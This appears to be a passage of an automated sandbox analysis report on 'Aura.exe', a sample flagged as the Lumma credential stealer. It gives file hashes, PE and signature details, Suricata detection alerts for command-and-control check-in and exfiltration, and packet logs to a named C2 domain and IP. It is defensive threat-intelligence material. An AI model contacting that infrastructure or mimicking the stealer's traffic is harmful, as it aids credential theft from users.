SSDEEP:	96:I1FsMnMsahLjTOAqyS3QXIDcQlc6VcEdcw3l+BHUHZ0ownOgHkEwH3dEFYAKckBH:QK2MSA0LR30auGzuiFcAZ24IO8S
MD5:	E052945E6E7DAA61E11FAD11F58790D7
SHA1:	994FD6CFC572F9063281076A3D2D758C9229DDB3
SHA-256:	164AE8CFBAC748DACF73E0CDB53E311208EF0CECD1DA1C0C10B928995AD70A1D
SHA-512:	6FE589645FE91B3ACA9B0F877FDFC1749CA0C2EB9117FB8B6F266B90360E26B96914CEA8A66EE1EDE3011DC2E1539ECC7968BF09F94FDF690D4821657CC7C49C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.5.8.1.5.0.7.8.6.5.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.5.8.1.5.6.0.9.9.0.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.d.4.c.c.a.e.-.f.4.d.4.-.4.1.7.7.-.b.0.0.b.-.f.3.4.0.d.8.e.2.0.0.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.2.2.a.3.5.1.-.2.0.7.6.-.4.9.3.3.-.a.e.b.2.-.8.9.0.0.a.a.3.2.f.b.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.u.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.8.-.0.0.0.1.-.0.0.1.4.-.6.8.a.9.-.1.a.c.b.a.0.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.0.9.2.f.3.8.a.9.1.e.8.4.d.d.a.1.7.b.5.7.9.e.d.e.4.7.3.f.d.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.1.b.1.2.4.4.c.5.e.5.f.9.0.2.e.2.1.2.5.2.d.e.e.0.f.0.1.7.d.3.d.4.a.0.3.0.4.6.!.A.u.r.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.6.4././.0.9././.2.1.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E99.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 18:36:55 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	152045
Entropy (8bit):	3.798016394014999
Encrypted:	false
SSDEEP:	1536:A6K7uBojRypN4uE2aORFLTgZhAHn5uCD8LetTFt6o:DKVU4uEqRFLTg8nLpt
MD5:	AB453BDFC33A0FD5F104D8466689A1F1
SHA1:	C73A3CA487CA655C134174F94D43AFD7E1A7A002
SHA-256:	A9A3FCEBC0B33DCFFFCF614F05E086045AB09A741C432EA472DD8F02213A4FD3
SHA-512:	692ABA68C7112AB04BF63AC77D726132BE9B6FE2BBA2184D03EA088132764464AAC3831E689138851D3A56602B9A8CEFB408D3ADFB4087C5D3A9FD26D328909E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......G.zg....................................$...........T..../..........`.......8...........T...........P$...-......................................................................................................eJ......P.......GenuineIntel............T.......X...F.zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F65.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.6905805653873838
Encrypted:	false
SSDEEP:	192:R6l7wVeJQG6YZ6Y9uSUcngmfLVJrprj89bnNsfitm:R6lXJZ6s6YESUcngmfLVJynGfh
MD5:	7B88A81CC58FAD69F6709B7FF5208C89
SHA1:	BFB08AC8C31F5AFACA5BFD84E512F5198A58ECCE
SHA-256:	2D1CDFBA87A35377B3BA69244D4A608F4D19A2AF37725989243CD856BF6C8421
SHA-512:	2AE0558049BCCFCB9516EABF070D1F8543C63A9618AAD9CD0179B031C14CE71BFD2FED68D220381B8EF34CDCE7E6F99DFACEBD40CF30CCE1FF530CE398CE409C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FF3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4662
Entropy (8bit):	4.429734427646169
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI90COWpW8VYwSvYm8M4Jz0dxPcf6FGo+q8vb0dxPcfkmMNnSx:uIjf1I7Lv7VHJzlfhoKblfkmMNn4rd
MD5:	5AA4676D022715C13C542E94CA416DFC
SHA1:	BC184E83FFFEAC6854CF959941CB4A1210D9CE2D
SHA-256:	ACC1EDEED468507EA853394E34123C9124DC4B6D5BA6A9CFAA545D0B90484DF1
SHA-512:	4DEB272C61E232DBFB7335E61283AFB803728373BACFD39273D2C3D248E3BEA9B645C4B991945A16C40BAA7180A9AC11D6D5D3541F177FADEE4D9351B20A24C0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662979" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465397235364716
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNYdwBCswSb6:zXD94+WlLZMM6YFHG+6
MD5:	B5D4DC2B131872B5677374DC34D7CF8C
SHA1:	0293F15647CBE75D9402A020AA0F7D18F4345BF0
SHA-256:	85E46B36E02E7859DE5450698FB8A8B85A7A6FDD4F2BE630B98FED3A80C9A4A4
SHA-512:	3D070B2D1307877E28839484C7F799F590B987D7D19A6A67AAB1E054661E77946B233AD795758C945233E4876D9A07DC09F3B342B6E13A3BDEDA087578569381
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz6f._..............................................................................................................................................................................................................................................................................................................................................\|.q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.932921920878322
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Aura.exe
File size:	378'920 bytes
MD5:	320bf7fbc1c911b3359527bf0ea85fca
SHA1:	cb1b1244c5e5f902e21252dee0f017d3d4a03046
SHA256:	3b2c100e17a3a58006bfa5ab9fc0bd4a3951f6ca5449d0d8ff7f8f1b3a2c9884
SHA512:	aa9d425c67417ce3a812b0284a1599ac7f09bd898270d9f94c19db016d122fb579728ca3f273d927cc7f6f58bc60404c541a339f91bebc7c20d04fdb456f02b6
SSDEEP:	6144:u9Y1yj7QbH9cmXVllnABXgebDPBG414r3drK+4rTp3kzVIBhVpwqskhmuy9Ax5af:G9j7QbH9zllABzDpZ14Bj4rTxMVIVpPw
TLSH:	6F8412288783D562DA8F5D3119D3894627F4F3413183739F2AC5F1B8C3227D86B96A9E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C,...............0.................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a4be
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa470	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5a200	0x2628	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa422	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84c4	0x8600	e05f1acca24b974a8126be170dff517b	False	0.5043726679104478	data	5.950953039580874	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x242	0x400	14d8e51a66bfa2cb04d0bad62fb2e968	False	0.3037109375	data	3.5160679793070893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	15941323991b3ba9288d6bda059fba10	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x10000	0x51200	0x51200	f84b80b1342d95637cf405913c3a686c	False	1.0003340475731894	data	7.999446172451969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:36:55.301827+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.4	55758	1.1.1.1	53	UDP
2025-01-05T19:36:55.784181+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:55.784181+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:56.714755+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:56.714755+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:57.205841+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:57.205841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:57.788731+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:57.788731+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:58.417248+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49738	104.21.80.1	443	TCP
2025-01-05T19:36:58.417248+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.80.1	443	TCP
2025-01-05T19:36:59.557409+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49741	104.21.80.1	443	TCP
2025-01-05T19:36:59.557409+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.80.1	443	TCP
2025-01-05T19:37:00.940183+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49744	104.21.80.1	443	TCP
2025-01-05T19:37:00.940183+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.80.1	443	TCP
2025-01-05T19:37:02.764925+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49745	104.21.80.1	443	TCP
2025-01-05T19:37:02.764925+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	104.21.80.1	443	TCP
2025-01-05T19:37:03.249051+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49745	104.21.80.1	443	TCP
2025-01-05T19:37:04.140291+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49747	104.21.80.1	443	TCP
2025-01-05T19:37:04.140291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	104.21.80.1	443	TCP
2025-01-05T19:37:06.819127+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.4	49750	104.21.80.1	443	TCP
2025-01-05T19:37:06.819127+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49750	104.21.80.1	443	TCP
2025-01-05T19:37:07.330972+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49750	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:36:55.319591045 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:55.319633961 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:55.319701910 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:55.322586060 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:55.322602987 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:55.784112930 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:55.784181118 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:55.788728952 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:55.788738012 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:55.788976908 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:55.840907097 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.007905006 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.007930040 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.008013010 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.714761972 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.714843988 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.714905024 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.716557026 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.716578007 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.716589928 CET	49733	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.716594934 CET	443	49733	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.727955103 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.727976084 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:56.728045940 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.728395939 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:56.728409052 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.205780983 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.205841064 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.351792097 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.351824999 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.352072001 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.353591919 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.353738070 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.353764057 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788729906 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788772106 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788800955 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788825989 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788830042 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.788856030 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788872957 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.788892984 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.788981915 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.788990974 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.789315939 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.789463997 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.789472103 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.793554068 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.793589115 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.793607950 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.793617010 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.793665886 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.793673038 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.840899944 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.879131079 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.879183054 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.879249096 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.879285097 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.879318953 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.879395008 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.879406929 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.879416943 CET	49735	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.879421949 CET	443	49735	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.935811996 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.935836077 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:57.935928106 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.936225891 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:57.936242104 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:58.417148113 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:58.417248011 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:58.418432951 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:58.418442965 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:58.418661118 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:58.425730944 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:58.425863981 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:58.425892115 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:58.425973892 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:58.425981998 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.075392008 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.075460911 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.075519085 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.075858116 CET	49738	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.075874090 CET	443	49738	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.093355894 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.093393087 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.093470097 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.093740940 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.093755960 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.557329893 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.557409048 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.558605909 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.558614969 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.558819056 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:36:59.560059071 CET	49741	443	192.168.2.4	104.21.80.1
